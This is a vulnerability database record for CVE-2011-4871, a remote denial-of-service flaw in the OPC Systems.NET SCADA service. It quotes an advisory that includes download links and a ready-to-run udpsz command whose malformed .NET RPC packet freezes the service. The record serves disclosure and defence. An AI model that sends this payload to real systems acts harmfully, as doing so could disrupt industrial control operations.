ID

VAR-E-201110-0085


CVE

cve_id:CVE-2011-4871

Trust: 1.9

sources: BID: 50047 // EXPLOIT-DB: 17965 // EDBNET: 40464

EDB ID

17965


TITLE

OPC Systems.NET 4.00.0048 - Denial of Service - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 17965

DESCRIPTION

OPC Systems.NET 4.00.0048 - Denial of Service. CVE-2011-4871CVE-76404 . dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 17965

AFFECTED PRODUCTS

vendor:opcmodel:systems.netscope:eqversion:4.00.0048

Trust: 1.0

vendor:opcmodel:systems.netscope:lteversion:<=4.00.0048

Trust: 0.6

vendor:opcmodel:systems opc systems.netscope:eqversion:4.0.48

Trust: 0.3

vendor:opcmodel:systems opc systems.netscope:neversion:5.0

Trust: 0.3

sources: BID: 50047 // EXPLOIT-DB: 17965 // EDBNET: 40464

EXPLOIT

#######################################################################

Luigi Auriemma

Application: OPC Systems.NET
http://www.opcsystems.com/opc_systems_net.htm
Versions: <= 4.00.0048
Platforms: Windows
Bug: Denial of Service
Exploitation: remote
Date: 10 Oct 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:
"As a Service Oriented Architecture the OPC Systems Service can connect
to data from OPC Servers, OPC Clients, Visual Studio Applications,
Microsoft Excel, and databases ... breakthrough .NET products for
SCADA, HMI, and plant floor to business solutions to shorten your
development to deployment time."

#######################################################################

======
2) Bug
======

OPCSystemsService.exe can be freezed with CPU at 100% through a
malformed .NET RPC packet.
No additional research performed.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17965.zip

udpsz -l 2000 -c ".NET\1\0\0\0\0\0\xff\xff\xff\xff\4\0\1\1\x25\0\0\0tcp://127.0.0.1/OPC Systems Interface\6\0\1\1" -T SERVER 58723 0x80

#######################################################################

======
4) Fix
======

No fix.

#######################################################################

Trust: 1.0

sources: EXPLOIT-DB: 17965

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 17965

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 17965

TYPE

Denial of Service

Trust: 1.6

sources: EXPLOIT-DB: 17965 // EDBNET: 40464

CREDITS

Luigi Auriemma

Trust: 0.6

sources: EXPLOIT-DB: 17965

EXTERNAL IDS

db:NVDid:CVE-2011-4871

Trust: 1.9

db:EXPLOIT-DBid:17965

Trust: 1.6

db:EDBNETid:40464

Trust: 0.6

db:ICS CERT ALERTid:ICS-ALERT-11-285-01

Trust: 0.3

db:ICS CERTid:ICSA-12-012-01

Trust: 0.3

db:BIDid:50047

Trust: 0.3

sources: BID: 50047 // EXPLOIT-DB: 17965 // EDBNET: 40464

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-4871

Trust: 1.6

url:https://www.exploit-db.com/exploits/17965/

Trust: 0.6

url:http://www.opcsystems.com/opc_systems_net.htm

Trust: 0.3

url:http://www.us-cert.gov/control_systems/pdf/icsa-12-012-01.pdf

Trust: 0.3

url:http://www.us-cert.gov/control_systems/pdf/ics-alert-11-285-01.pdf

Trust: 0.3

sources: BID: 50047 // EXPLOIT-DB: 17965 // EDBNET: 40464

SOURCES

db:BIDid:50047
db:EXPLOIT-DBid:17965
db:EDBNETid:40464

LAST UPDATE DATE

2022-07-27T10:01:18.652000+00:00


SOURCES UPDATE DATE

db:BIDid:50047date:2012-01-27T16:30:00

SOURCES RELEASE DATE

db:BIDid:50047date:2011-10-11T00:00:00
db:EXPLOIT-DBid:17965date:2011-10-10T00:00:00
db:EDBNETid:40464date:2011-10-10T00:00:00